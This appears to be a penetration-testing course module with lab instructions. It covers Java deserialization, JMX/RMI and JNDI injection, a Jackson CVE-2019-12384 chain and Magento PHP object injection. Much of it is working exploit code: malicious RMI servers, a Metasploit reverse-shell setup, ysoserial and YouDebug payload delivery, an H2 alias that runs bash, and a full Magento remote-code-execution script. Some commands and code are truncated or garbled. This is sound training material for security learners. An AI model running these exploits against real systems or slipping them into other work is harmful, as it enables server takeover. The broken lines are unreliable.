116 - Advanced - Web - Application - Exploitation Hide01.ir

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Advanced Web


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▪ This course section is accompanied by a Virtual Machine that you must download and import.
The developer user’s password is monica06. By executing sudo su and providing the
aforementioned password you can become root.
▪ This section relies heavily on the excellent work that was done by the infosec community. Some
of the text is a lightly edited version of the original text. Refer to the References part for the full-
blown articles. Credit goes to the respective researchers and companies.

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Web application penetration testers should be aware of the Java features that they leverage when
attacking Java applications. Some relevant Java features are polymorphism, serialization and reflection.

Object-oriented programming languages allow for Polymorphism (a.k.a “one interface, various
implementations”). Java does that through interfaces, abstract classes and concrete classes. A great
example is Java’s java.util.Map interface. When a class wants to be considered a Map, it must
implement method signatures that the java.util.Map interface defines. java.util.HashMap is a
known implementation of the aforementioned interface. Programmers are free to create their own
Map implementation, as follows.

public class XToZMap implements Map<Integer, String> { ... }

In case we want to utilize XToZMap functionality, we can do that as follows.

public class NewMap extends XToZMap { ... }

If XToZMap included the keyword final in its declaration (concrete class), then the Java Compiler
or JVM would prevent NewMap from being created.

How polymorphism looks like in the “flesh” you may ask? Find an example below…

void useMap(Map<Integer, String> m) { ... }

XToZMap map1 = new XToZMap ();
HashMap<Integer, String> map2 = new HashMap<>();

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The above code excerpt is an example of using polymorphic classes. A developer can write useMap
without caring which Map implementation is passed.
Java’s Serialization feature has been covered in the course already. Let us only mention that Java
deserialization utilizes that the java.io.Serializable interface and the java.io.ObjectOutputStream and
java.io.ObjectInputStream classes.
Reflection in Java (and other programming languages) is a type of metaprogramming that allows
for information retrieval and modification at runtime. We have also seen reflection being defined as
“the ability of a programming language to inspect itself”. Reflection is usually not needed when
creating Java applications. That being said, penetration testers heavily use reflection during exploit
development and exploitation.

The reflection API is a quite powerful feature. To get an idea of how it can be used, see the source
code below.

Map proxyInstance = (Map) Proxy.newProxyInstance(

new Class[] { Map.class },
(proxy, method, methodArgs) -> {
if (method.getName().equals("get")) {
return 42;
} else {
throw new UnsupportedOperationException(
"Unsupported method: " + method.getName());

The above code excerpt is an example of implementing Map with reflection. The lambda above
implements the java.lang.reflect.InvocationHandler interface. Upon method invocation the code
above will be called. The handler will be responsible for handling the various method calls.

Let’s bring everything together in a hands-on lab…

Lab 1: Java Remote Code Execution Internals

In the /home/developer/Downloads/vulnerable/java_security directory, a vulnerable Java server

exists that accepts (through HTTP) and deserializes a submission
(com.cisco.amp.server.Submission). Inside com.cisco.amp.server.SubmissionController the

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vulnerability is obvious, deserialization of untrusted data. Study the aforementioned source code
parts and see for yourself.

As penetration testers, we should try sending a crafted submission.

By studying the Submission class, a Collection<string> member attracts our attention. Collection is
an interface and, as previously discussed, we can leverage polymorphism to provide the server with
our own custom (malicious) collection. Essentially, we will try to override the Collection method
that the server calls.

First, see below how remote code execution can be achieved in Java.

Runtime.getRuntime().exec("touch /tmp/xxx");

A malicious collection could look, as follows.

private static Collection<String> CraftMaliciousCollection() {

return new ArrayList<String>(){
public Iterator iterator() {
try {
Runtime.getRuntime().exec("touch /tmp/xxx");
} catch (IOException e) {
return null;

Unfortunately, polymorphism (the malicious collection) is not enough to create a working exploit.
During deserialization, classloaders are utilized for finding the bytecode of the passed classes. In
the case of our exploit, those will be missing. Luckily, reflection can be used to make the server
capable of finding and executing our exploit code. Under the hood, reflection will use classes that
the server already contains.

The vulnerable server included the below dependency.

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The dependency above includes two interesting classes

org.codehaus.groovy.runtime.ConvertedClosure and
org.codehaus.groovy.runtime.MethodClosure.ConvertedClosure. They implement InvocationHandler.
Why is this dependency important? Because we can’t use a custom implementation of
InvocationHandler. As discussed, a reflective Collection implementation requires using classes that
the server has access to. The latest version of our malicious collection looks as follows.

private static Collection<String> CraftMaliciousCollection() {

MethodClosure methodClosure = new MethodClosure("touch /tmp/xxx",
ConvertedClosure iteratorHandler = new ConvertedClosure(methodClosure,
Collection exploitCollection = (Collection) Proxy.newProxyInstance(
Client.class.getClassLoader(), new Class<?>[]{Collection.class},
return exploitCollection

The reflective implementation is facilitated by Closure (like the previously mentioned Java
lambda), since an implementation of it (MethodClosure) can run a system command.

To try the exploitation process yourself, execute the below inside the provided Virtual Machine (in
two different terminals).

java -jar

java -jar

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A file named “xxx” will now be visible inside the /tmp directory.

Feel free to study the related source code of the client, to see how the exploit was developed.


Truth be told, RMI is no longer used during application development. That being said, RMI is still
being heavily used to remotely monitor applications via JMX.

Java Management Extensions (JMX) is a Java technology that supplies tools for managing and
monitoring applications, system objects, devices (such as printers) and service-oriented networks.
It should be noted that JMX is not only able to read values from a remote system, it can also invoke
methods on the system.

JMX enables managing resources through managed beans. A managed bean (MBean) is a Java Bean
class in accordance with the JMX standard. An application can be managed over JMX through an
MBean that is related to it. Accessing a MBean/JMX service can be performed through the “jconsole”
tool (included on the available JDK).

Connecting to a remote MBean server requires the existence of a JMX connector (on the remote

By default, Java provides a remote JMX connector that is based on Java RMI (Remote Method
Invocation). In general, you can enable JMX by adding the following arguments to the java call.

-Dcom.sun.management.jmxremote.port=2222 -
Dcom.sun.management.jmxremote.authenticate=false -

If we perform a port scan on the remote system, we should be able to see that the TCP port 2222
actually hosts a RMI naming registry that exposes one object under the name “jmxrmi”. The actual
RMI service can be accessed on a randomly-selected TCP port.

In case we have a client that is not written in Java and therefore can’t use Java RMI, a JMX adaptor is
used to facilitate the entering to the Java environment.

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At this point we should note that an insufficiently secure JMX instance (unprotected or easily brute-
forced) can result in total application compromise. Let’s see an example:

Lab 2: Attacking RMI-based JMX Services

In the /home/developer/Downloads/solr-8.1.1/ directory, a vulnerable solr instance exists that

exposes an unprotected JMX service. You can start solr, as follows.

cd /home/developer/Downloads/solr-8.1.1/solr/bin
./solr start

Now, spin up a penetration testing distribution and perform a thorough nmap scan against the
provided Virtual Machine (use the -sC, -sV and -A options, the rmi-dumpregistry nse script may be
needed as well to identify the name where the JMX RMI interface is bound). You should see the below.

To compromise the unprotected service, execute the below inside Metasploit.

use exploit/multi/misc/java_jmx_server
set RHOSTS <the provided vm’s IP>
set RPORT 18983
set payload java/meterpreter/reverse_tcp
set LHOST <your attacking vm’s ip>

A new meterpreter session should be established.

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According to Veracode, “Java Naming and Directory Interface (JNDI) is a Java API that allows clients
to discover and look up data and objects via a name. These objects can be stored in different naming
or directory services, such as Remote Method Invocation (RMI), Common Object Request Broker
Architecture (CORBA), Lightweight Directory Access Protocol (LDAP), or Domain Name Service

In other words, JNDI is a simple Java API (such as 'InitialContext.lookup(String name)') that takes just
one string parameter, and if this parameter comes from an untrusted source, it could lead to remote
code execution via remote class loading.

When the name of the requested object is controlled by an attacker, it is possible to point a victim
Java application to a malicious rmi/ldap/corba server and respond with an arbitrary object. If this
object is an instance of "javax.naming.Reference" class, a JNDI client tries to resolve the "classFactory"
and "classFactoryLocation" attributes of this object. If the "classFactory" value is unknown to the
target Java application, Java fetches the factory's bytecode from the "classFactoryLocation" location
by using Java's URLClassLoader.

Due to its simplicity, it is very useful for exploiting Java vulnerabilities even when the
'InitialContext.lookup' method is not directly exposed to the tainted data. In some cases, it still can be
reached via Deserialization or Unsafe Reflection attacks.”

Lab 3: JNDI Injections before JDK 1.8.0_191

In the provided Virtual Machine open a new terminal and execute intellij-idea-community.

Go to File, Open and navigate to /home/developer/IdeaProjects/HelloWorld.

Then press OK.

What you will see is a sample application that insecurely utilizes InitialContext.lookup.

import javax.naming.Context;
import javax.naming.InitialContext;
public class HelloWorld {
public static void main(String[] args) throws Exception {
String uri = "rmi://localhost:1097/Object";
Context ctx = new InitialContext();

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If what you see inside HelloWorld.java is different than the above. Delete everything and copy-paste
the above code.

If an attacker manages to tamper with the uri String, he will essentially perform a JNDI injection that
will lead to remote code execution, if the utilized JDK version is chronologically before JDK 1.8.0_191.
Remote code execution will be achieved through remote class loading.

To do that as an attacker, you first need to create the malicious class to be loaded. See such a class

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.Reader;
import javax.print.attribute.standard.PrinterMessageFromOperator;
public class Object {
public Object() throws IOException,InterruptedException{
String cmd="whoami";
final Process process = Runtime.getRuntime().exec(cmd);
int value=process.waitFor();

private static void printMessage(final InputStream input) {

// TODO Auto-generated method stub
new Thread (new Runnable() {


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public void run() {
// TODO Auto-generated method stub
Reader reader =new InputStreamReader(input);
BufferedReader bf = new BufferedReader(reader);
String line = null;
try {
while ((line=bf.readLine())!=null)
}catch (IOException e){

You also need a malicious RMI Server. See such a server below.

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;

public class EvilRMIServer {

public static void main(String args[]) throws Exception {

Registry registry = LocateRegistry.createRegistry(1097);

Reference aa = new Reference("Object", "Object",


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ReferenceWrapper refObjWrapper = new ReferenceWrapper(aa);
System.out.println("Binding 'refObjWrapper' to
registry.bind("Object", refObjWrapper);

To witness the attack in action, execute the below.

Inside the provided Virtual Machine:

• Inside IntelliJ IDEA, go to File, Open and navigate to

/home/developer/IdeaProjects/EvilRMIServer. Then, click OK and open the project in a new
• Delete any source code you see inside EvilRMIServer.java and copy-paste the source code of
the malicious RMI Server above.
• Open a new terminal and execute sudo update-alternatives --config javac
Choose /opt/jdk/jdk1.7.0_80/bin/javac

Also execute sudo update-alternatives --config java and choose

• Navigate to /home/developer/Downloads/vulnerable/jndi_before and execute javac
Object.java (Object.java contains the malicious class we talked about above)


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• In the same directory execute python -m SimpleHTTPServer 8081
• Inside IntelliJ IDEA, change the module SDK to 1.7.0_80 (JDKs are available on /opt/jdk), go
to File, Settings and change the Project bytecode version to 7. Finally, go to Run and click Run
• Finally, inside IntelliJ IDEA go to the HelloWorld project, change the used SDK to 1.7.0_80,
navigate to Run and click Run ‘HelloWorld’.

You should see the below.

In this case, we simulated the JNDI injection. HelloWorld pointed to our EvilRMIServer.
EvilRMIServer successfully caused our malicious class to be loaded into the HelloWorld application
and the specified whoami command was executed successfully.

The same could have been achieved without the EvilRMIServer project, with the help of
https://github.com/mbechler/marshalsec, as follows.

▪ Terminate and close the EvilRMIServer project (keep the python server alive)
▪ Open a new terminal and navigate to /home/developer/Downloads/marshalsec/target
▪ Execute java -cp marshalsec-0.0.3-SNAPSHOT-all.jar

▪ Point the HelloWorld application to port 1099 (simulating a JNDI injection) and click Run
‘HelloWorld’ again.


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The result will be the same!

This technique worked well up to Java 8u121 when Oracle added codebase restrictions to RMI.

After that, it was possible to use a malicious LDAP server. You can try this attack in the provided
Virtual Machine as follows.

• Keep the python server that was hosting the malicious class alive.
• Open a new terminal and navigate to /home/developer/Downloads/marshalsec/target
• Execute java -cp marshalsec-0.0.3-SNAHOT-all.jar

• Point the HelloWorld application to port 1389 (simulating a JNDI injection) and click Run
‘HelloWorld’ again (notice the protocol change in the code).


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Lab 4: JNDI Injections after JDK 1.8.0_191

According to Veracode, “Since Java 8u191, when a JNDI client receives a Reference object, its
"classFactoryLocation" is not used, either in RMI or in LDAP. On the other hand, we still can specify
an arbitrary factory class in the "javaFactory" attribute.

This class will be used to extract the real object from the attacker's controlled
"javax.naming.Reference". It should exist in the target classpath, implement
"javax.naming.spi.ObjectFactory" and have at least a "getObjectInstance" method:

public interface ObjectFactory {

* Creates an object using the location or reference information
* specified.
* ...
public Object getObjectInstance(Object obj, Name name, Context nameCtx,
Hashtable environment)
throws Exception;


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The main idea was to find a factory in the target classpath that does something dangerous with the
Reference's attributes. Looking at the different implementations of this method in the JDK and
popular libraries, we found one that seems very interesting in terms of exploitation.

The "org.apache.naming.factory.BeanFactory" class within Apache Tomcat Server contains a logic for
bean creation by using reflection.

public class BeanFactory

implements ObjectFactory {

* Create a new Bean instance.
* @param obj The reference object describing the Bean
public Object getObjectInstance(Object obj, Name name, Context nameCtx,
Hashtable environment)
throws NamingException {

if (obj instanceof ResourceRef) {

try {

Reference ref = (Reference) obj;

String beanClassName = ref.getClassName();
Class beanClass = null;
ClassLoader tcl =
if (tcl != null) {
try {
beanClass = tcl.loadClass(beanClassName);
} catch(ClassNotFoundException e) {
} else {
try {
beanClass = Class.forName(beanClassName);
} catch(ClassNotFoundException e) {


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BeanInfo bi = Introspector.getBeanInfo(beanClass);
PropertyDescriptor[] pda = bi.getPropertyDescriptors();

Object bean = beanClass.getConstructor().newInstance();

/* Look for properties with explicitly configured setter */

RefAddr ra = ref.get("forceString");
Map forced = new HashMap<>();
String value;

if (ra != null) {
value = (String)ra.getContent();
Class paramTypes[] = new Class[1];
paramTypes[0] = String.class;
String setterName;
int index;

/* Items are given as comma separated list */

for (String param: value.split(",")) {
param = param.trim();
/* A single item can either be of the form name=method
* or just a property name (and we will use a standard
* setter) */
index = param.indexOf('=');
if (index >= 0) {
setterName = param.substring(index + 1).trim();
param = param.substring(0, index).trim();
} else {
setterName = "set" +
param.substring(0, 1).toUpperCase(Locale.ENGLISH) +
try {


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beanClass.getMethod(setterName, paramTypes));
} catch (NoSuchMethodException|SecurityException ex) {
throw new NamingException
("Forced String setter " + setterName +
" not found for property " + param);

Enumeration e = ref.getAll();

while (e.hasMoreElements()) {

ra = e.nextElement();
String propName = ra.getType();

if (propName.equals(Constants.FACTORY) ||
propName.equals("scope") || propName.equals("auth") ||
propName.equals("forceString") ||
propName.equals("singleton")) {

value = (String)ra.getContent();

Object[] valueArray = new Object[1];

/* Shortcut for properties with explicitly configured setter */

Method method = forced.get(propName);
if (method != null) {
valueArray[0] = value;
try {
method.invoke(bean, valueArray);
} catch (IllegalAccessException|
InvocationTargetException ex) {
throw new NamingException


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("Forced String setter " + method.getName() +
" threw exception for property " + propName);

The "BeanFactory" class creates an instance of arbitrary bean and calls its setters for all properties.
The target bean class name, attributes, and attribute's values all come from the Reference object,
which is controlled by an attacker.

The target class should have a public no-argument constructor and public setters with only one
"String" parameter. In fact, these setters may not necessarily start from 'set..' as "BeanFactory"
contains some logic surrounding how we can specify an arbitrary setter name for any parameter.

/* Look for properties with explicitly configured setter */

RefAddr ra = ref.get("forceString");
Map forced = new HashMap<>();
String value;

if (ra != null) {
value = (String)ra.getContent();
Class paramTypes[] = new Class[1];
paramTypes[0] = String.class;
String setterName;
int index;

/* Items are given as comma separated list */

for (String param: value.split(",")) {
param = param.trim();
/* A single item can either be of the form name=method
* or just a property name (and we will use a standard
* setter) */
index = param.indexOf('=');
if (index >= 0) {
setterName = param.substring(index + 1).trim();
param = param.substring(0, index).trim();
} else {


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setterName = "set" +
param.substring(0, 1).toUpperCase(Locale.ENGLISH) +

The magic property used here is "forceString". By setting it, for example, to "x=eval", we can make a

method call with name 'eval' instead of 'setX', for the property 'x'.

So, by utilizing the "BeanFactory" class, we can create an instance of arbitrary class with default

constructor and call any public method with one "String" parameter.

One of the classes that may be useful here is "javax.el.ELProcessor". In its "eval" method, we can

specify a string that will represent a Java expression language template to be executed.

package javax.el;
public class ELProcessor {
public Object eval(String expression) {
return getValue(expression, Object.class);

And here is a malicious expression that executes arbitrary command when evaluated:


After 1.8.0_191, we need an RMI server that utilizes the above to achieve remote code execution. Such
a malicious RMI server can be found below.


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import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;

public class EvilRMIServer {

public static void main(String[] args) throws Exception {
System.out.println("Creating evil RMI registry on port 1097");
Registry registry = LocateRegistry.createRegistry(1097);

//prepare payload that exploits unsafe reflection in

ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "",
"", true,"org.apache.naming.factory.BeanFactory",null);
//redefine a setter name for the 'x' property from 'setX' to 'eval',
see BeanFactory.getObjectInstance code
ref.add(new StringRefAddr("forceString", "x=eval"));
ref.add(new StringRefAddr("x",

ReferenceWrapper referenceWrapper = new

registry.bind("Object", referenceWrapper);

You can practice this attack inside the provided Virtual Machine as follows.

• Inside IntelliJ IDEA, go to File, Open and navigate to

/home/developer/IdeaProjects/EvilRMIServer. Then, click OK and open the project in a new
• Change the SDK to 1.8.0_241 and the project bytecode version to 8


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• Delete any source code you see inside EvilRMIServer.java and copy-paste the source code of
the malicious RMI Server above.
• Finally, go to Run and click Run ‘EvilRMIServer’

• Inside IntelliJ IDEA, go to File, Open and navigate to

/home/developer/IdeaProjects/HelloWorld. Then, click OK and open the project in a new

• Change the SDK to 1.8.0_241

• Finally, point the application to the EvilRMIServer (simulating a JNDI injection), go to Run
and click Run ‘HelloWorld’

Inside the /tmp directory a file named rce should now exist!


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We have already come across Java RMI, when attacking RMI-based JMX services. This time we will
focus Java RMI services. Java RMI is the Java version of distributed object communication and is
mainly used to implement client-/server applications like Java-based fat clients. Like most
implementations, Java is using stubs and skeletons to do this. To create those stubs and skeletons,
Java requires that the service must define an interface which extends the Remote interface.

To make this implementation accessible over the network, the server must register a service instance
under a name in a RMI Naming Registry. The service instance gets registered under a certain name.
Clients can query the register to get a reference for the serve-side object and which interfaces its
implements. Most RMI naming registries use the default port (TCP 1099) for the naming registry but
an arbitrary port can be used.

Note: The RMI standard by itself does not provide any form of authentication. This is therefore often
implemented on the application level, for example by providing a “login” method that can be called
by the client. This moves security to the (attacker controlled) client, which is always a bad idea.

RMI services are based on Java Deserialization, they can be exploited if a valid gadget is available in
the classpath of the service. The introduction of JEP 290 killed the known RMI exploits in ysoserial
(RMIRegistryExploit and JRMPClient).

That being said, we can still attack Java RMI services at the application level, as long as no process-
wide filters have been set. This can be achieved:

1. By writing a custom client that will pass a malicious object to the server. This requires
access to an interface (that provides a method that accepts n arbitrary object as an
argument). A real-life example of this is https://nickbloor.co.uk/2018/06/18/another-
2. By bypassing the fact that most interfaces don’t provide methods that accept an arbitrary
object as argument. Most methods only accept native types like Integer, Long or a class
i. When a class instance is accepted, this “type” limitation can be bypassed due to
some native RMI functionality on the server side. Specifically, when a RMI client
invokes a method on the server, the method “marshalValue” gets called in
sun.rmi.server.UnicastServerRef.dispatch, to read the method arguments from the
Object input stream.

// unmarshal parameters
Class<?>[] types = method.getParameterTypes();
Object[] params = new Object[types.length];

try {


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for (int i = 0; i < types.length; i++) {
params[i] = unmarshalValue(types[i], in);

Below is the actual code of “unmarshalValue” (from “sun.rmi.server.UnicastRef”).

Depending on the expected argument type, the method reads the value from the
object stream. If we don’t deal with a primitive type like an Integer, readObject()
is called allowing to exploit Java deserialization.

* Unmarshal value from an ObjectInput source using RMI's
* format for parameters or return values.
protected static Object unmarshalValue(Class<?> type,
ObjectInput in)
throws IOException, ClassNotFoundException
if (type.isPrimitive()) {
if (type == int.class) {
return Integer.valueOf(in.readInt());
} else if (type == boolean.class) {
return Boolean.valueOf(in.readBoolean());
} else if (type == byte.class) {
return Byte.valueOf(in.readByte());
} else if (type == char.class) {
return Character.valueOf(in.readChar());
} else if (type == short.class) {
return Short.valueOf(in.readShort());
} else if (type == long.class) {
return Long.valueOf(in.readLong());
} else if (type == float.class) {
return Float.valueOf(in.readFloat());
} else if (type == double.class) {
return Double.valueOf(in.readDouble());
} else {
throw new Error("Unrecognized primitive type:
" + type);
} else {
return in.readObject();


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Since the attacker has full control over the client, he can replace an argument that
derives from the Object class (for example a String) with a malicious object. There
are several ways to archive this:

▪ Copy the code of the java.rmi package to a new package and change the
code there
▪ Attach a debugger to the running client and replace the objects before
they are serialized
▪ Change the bytecode by using a tool like Javassist
▪ Replace the already serialized objects on the network stream by
implementing a proxy

Let’s try the last approach inside the provided Virtual Machine…

Lab 5: Attacking Java RMI Services After JEP 290

During this lab we will utilize the YouDebug dynamic instrumentation framework. YouDebug
provides a Groovy wrapper for JDI so that it can be easily scripted. What we need to achieve is set a
breakpoint on the “invokeRemoteMethod” from the
“java.rmi.server.RemoteObjectInvocationHandler” class to intercept the communication and replace
the parameters that are passed to the RMI call before they get serialized by the client.

mogwailabs.de were generous enough to provide the community with a such a script and a
vulnerable RMI Service for our tests. The YouDebug script can be found below.

// Unfortunately, YouDebug does not allow to pass arguments to the

// you can change the important parameters here
def payloadName = "CommonsCollections6";
def payloadCommand = "touch /tmp/pwn3d_by_barmitzwa";
def needle = "12345"

println "Loaded..."

// set a breakpoint at "invokeRemoteMethod", search the passed argument

for a String object
// that contains needle. If found, replace the object with the
generated payload
", "invokeRemoteMethod") {


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println "[+]
java.rmi.server.RemoteObjectInvocationHandler.invokeRemoteMethod() is

// make sure that the payload class is loaded by the classloader of

the debugee
vm.loadClass("ysoserial.payloads." + payloadName);

// get the Array of Objects that were passed as Arguments

delegate."@2".eachWithIndex { arg,idx ->
println "[+] Argument " + idx + ": " + arg[0].toString();
if(arg[0].toString().contains(needle)) {
println "[+] Needle " + needle + " found, replacing String with
// Create a new instance of the ysoserial payload in the
def payload = vm._new("ysoserial.payloads." + payloadName);
def payloadObject = payload.getObject(payloadCommand)

println "[+] Done.."

To try this attack on the provided Virtual Machine, perform the below.

▪ Execute sudo update-alternatives --config java and choose

▪ Start the vulnerable RMI Service
o cd /home/developer/Downloads/vulnerable/rmi-
o java -jar BSidesRMIService-0.1-jar-with-dependencies.jar
▪ Start the client in a new terminal (simulating the attacker at this point)
o cd /home/developer/Downloads/vulnerable/rmi-
o java -
-cp "./libs/*" de.mogwailabs.BSidesRMIService.BSidesClient
▪ Start the proxy in a new terminal
o cd /home/developer/Downloads/
o java -jar youdebug-1.5.jar -socket barmitzwa.groovy


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A file named “pwn3d_by_barmitzwa” should now exist inside the /tmp directory!

So far, we have seen remote code execution being achieved through class loading. When it comes to
RMI services where a valid gadget is available in the classpath, remote code execution can also be
achieved by attacking the Distributed Garbage Collection (DGC) for deserialization of untrusted data,
in older versions of Java.

To try this attack on the provided Virtual Machine, perform the below.

▪ Execute sudo update-alternatives --config java and choose

▪ Terminate and restart the vulnerable RMI Service
o cd /home/developer/Downloads/vulnerable/rmi-
o java -jar BSidesRMIService-0.1-jar-with-dependencies.jar
▪ Start the attacking client (an older version of CommonsCollections is bundled with the
vulnerable service)
o cd /home/developer/Downloads/
o java -cp ysoserial-master-30099844c6-1.jar
ysoserial.exploit.JRMPClient 1099 CommonsCollections1
"touch /tmp/xxx"

A file named “xxx” should now exist inside the /tmp directory!


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We have already covered Attacking Java Deserialization during the course. Let’s now see a more
complicated case.

We will study how a deserialization vulnerability of an older Jackson library (used for deserializing
JSONs) can result in SSRF and RCE attacks.

According to Jackson’s author, a vulnerable application looks as follows.

(1) The application accepts JSON content sent by an untrusted client (composed either manually or
by a code you did not write and have no visibility or control over) — meaning that you cannot
constrain JSON itself that is being sent

(2) The application uses polymorphic type handling for properties with nominal type of
java.lang.Object (or one of small number of “permissive” tag interfaces such as java.util.Serializable,

(3) The application has at least one specific “gadget” class to exploit in the Java classpath. In detail,
exploitation requires a class that works with Jackson. In fact, most gadgets only work with specific
libraries — e.g. most commonly reported ones work with JDK serialization

(4) The application uses a version of Jackson that does not (yet) block the specific “gadget” class.
There is a set of published gadgets which grows over time, so it is a race between people finding and
reporting gadgets and the patches. Jackson operates on a blacklist. The deserialization is a “feature”
of the platform and they continually update a blacklist of known gadgets that people report.

What Andrea Brancaleoni at doyensec discovered was that when Jackson deserializes
ch.qos.logback.core.db.DriverManagerConnectionSource, this class can be abused to instantiate a
JDBC connection. Why is this important you may ask?
According to the researcher, “JDBC is a Java API to connect and execute a query with the database
and it is a part of JavaSE (Java Standard Edition). Moreover, JDBC uses an automatic string to class
mapping, as such it is a perfect target to load and execute even more “gadgets” inside the chain.”

Let’s try exploiting this vulnerability in the provided Virtual Machine…

Lab 6: Jackson CVE-2019-12384


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test.rb is used to load arbitrary polymorphic classes easily in a given directory and prepare the
Jackson environment to meet the first two requirements (1,2) listed above

require 'java'
Dir["./classpath/*.jar"].each do |f|
require f
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);
puts "Serializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all
the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)

To try this attack on the provided Virtual Machine, perform the below.

▪ Open a new terminal and start a listener, as follows.

o nc -nlvp 8080
▪ Open a new terminal and execute the following.
o cd /home/developer/Downloads/vulnerable/doyensec/CVE-2019-12384
o jruby test.rb

You should see a connection being made to your netcat listener.


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On line 15 of the script, Jackson will recursively call all of the setters with the key contained inside
the sub-object. To be more specific, the setUrl(String url) is called with arguments by the Jackson
reflection library. After that phase (line 17) the full object is serialized into a JSON object again. At
this point all the fields are serialized directly, if no getter is defined, or through an explicit getter. The
interesting getter for us is getConnection().

JDBC Drivers are classes that, when a JDBC url is passed in, are automatically instantiated and the full
URL is passed to them as an argument, so when getConnection is called, an in-memory database is
instantiated. The above jruby command creates a connection to a remote database (our netcat
listener in this case).

We simulated an SSRF attack through deserialization.

What if we wanted to achieve RCE?

For this we will leverage the H2 JDBC driver being loaded. Specifically, since H2 is implemented inside
the JVM, it has the capability to specify custom aliases containing java code. This behavior/capability
can be abused to achieve remote code execution through the below inject.sql file.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws

java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new
return s.hasNext() ? s.next() : ""; }
CALL SHELLEXEC('id > exploited.txt')

To try this attack on the provided Virtual Machine, perform the below.

▪ Open a new terminal and execute the following

o cd /home/developer/Downloads/vulnerable/doyensec/CVE-2019-12384
o python -m SimpleHTTPServer 8080


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▪ Open a new terminal and execute the following.
o cd /home/developer/Downloads/vulnerable/doyensec/CVE-2019-12384
o jruby test.rb
FROM 'http://localhost:8080/inject.sql'\"}]"

You should see a file named exploited.txt inside the current directory.


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a. PHP Deserialization (A Deeper Dive)

We have already covered Attacking PHP Deserialization during the course. Let’s now see two more
complicated cases and specifically, how the Property Oriented Programming (POP) chains are made.

First, we will analyze a PHP Object Injection vulnerability in Magento

Let’s first try the attack inside the provided Virtual Machine and then we will see how the POP chain
was discovered.

The root cause of the vulnerability is the below.

// app/code/core/Mage/Adminhtml/controllers/DashboardController.php
public function tunnelAction()
$gaData = $this->getRequest()->getParam('ga');
$gaHash = $this->getRequest()->getParam('h');
if ($gaData && $gaHash) {
$newHash = Mage::helper('adminhtml/dashboard_data')-
if ($newHash == $gaHash) {
if ($params = unserialize(base64_decode(urldecode($gaData)))) {

User-supplied data are insecurely deserialized in the ga parameter.

Lab 7: Magento PHP Object Injection

To try this attack on the provided Virtual Machine, perform the below.

▪ Power up a pentesting distribution such as Kali Linux

▪ Edit /etc/hosts so that the Virtual Machine’s IP is related to magentosite.com and


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▪ Save the below exploit as 37811.py


# Exploit Title: Magento CE < Post Auth RCE

# Google Dork: "Powered by Magento"

# Date: 08/18/2015

# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com

# Vendor Homepage: http://magento.com/

# Software Link: https://www.magentocommerce.com/download

# Version: and below

# Tested on: Ubuntu 15

# CVE : none

from hashlib import md5

import sys

import re

import base64

import mechanize


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def usage():

print "Usage: python %s <target> <argument>\nExample: python %s

http://localhost \"uname -a\""


if len(sys.argv) != 3:


# Command-line args

target = sys.argv[1]

arg = sys.argv[2]

# Config.

username = 'ypwq'

password = '123'

php_function = 'system' # Note: we can only pass 1 argument to the


install_date = 'Wed, 29 Jan 2020 16:42:59 +0000' # This needs to be

the exact date from /app/etc/local.xml

# POP chain to pivot into call_user_exec

payload =
Writer_Mail\":4:{s:16:' \

RMINATE!\";i:2;s:15:\"' \


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0_layout\";O:23:\"' \

s:17:\"\00*\00' \

:8:\"\00*\00_data\"' \

% (len(php_function), php_function,

len(arg), arg)

# Setup the mechanize browser and options

br = mechanize.Browser()

br.set_proxies({"http": "localhost:8080"})


request = br.open(target)


br.form.new_control('text', 'login[username]', {'value': username}) #

Had to manually add username control.


br['login[username]'] = username

br['login[password]'] = password

#userone = br.find_control(name="login[username]", nr=0)

#userone.value = username


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#pwone = br.find_control(name="login[password]", nr=0)

#pwone.value = password

br.method = "POST"

request = br.submit()

content = request.read()

url = re.search("ajaxBlockUrl = \'(.*)\'", content)

url = url.group(1)

key = re.search("var FORM_KEY = '(.*)'", content)

key = key.group(1)

request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true',

data='isAjax=false&form_key=' + key)

tunnel = re.search("src=\"(.*)\?ga=", request.read())

tunnel = tunnel.group(1)

payload = base64.b64encode(payload)

gh = md5(payload + install_date).hexdigest()

exploit = tunnel + '?ga=' + payload + '&h=' + gh


request = br.open(exploit)

except (mechanize.HTTPError, mechanize.URLError) as e:


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print e.read()

▪ Start a Burp Proxy and instruct it to intercept responses as well

▪ Open a new terminal and execute the following
o python 37811.py http://magentosite.com/index.php/admin "uname -a"

If you now forward all intercepted requests in Burp you will eventually see the result of the specified
command inside the final response.

Let’s now focus on the POP chain.

The included (and autoloaded) Varien library provides all gadgets we need to execute arbitrary code
on the server.

The deprecated class Varien_File_Uploader_Image provides a destructor as our initial gadget that
allows us to jump to arbitrary clean() methods.

// lib/Varien/File/Uploader/Image.php:357
function __destruct()

This way, we can jump to the clean() method of the class Varien_Cache_Backend_Database. It fetches
a database adapter from the property _adapter and executes a TRUNCATE TABLE query with its


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query() method. The table name can be controlled by the attacker by setting the property

// lib/Varien/Cache/Backend/Database.php
public function clean($mode = Zend_Cache::CLEANING_MODE_ALL, $tags = array())
$adapter = $this->_adapter;
switch($mode) {
case Zend_Cache::CLEANING_MODE_ALL:
if ($this->_options['store_data']) {
$result = $adapter->query('TRUNCATE TABLE '.$this-

If we provide the Varien_Db_Adapter_Pdo_Mysql as database adapter, its query() method passes along
the query to the very interesting method _prepareQuery(), before the query is executed.

// lib/Varien/Db/Adapter/Pdo/Mysql.php
public function query($sql, $bind = array())
try {
$this->_prepareQuery($sql, $bind);
$result = parent::query($sql, $bind);
} catch (Exception $e) {

The _prepareQuery() method uses the _queryHook property for reflection. Not only the method name
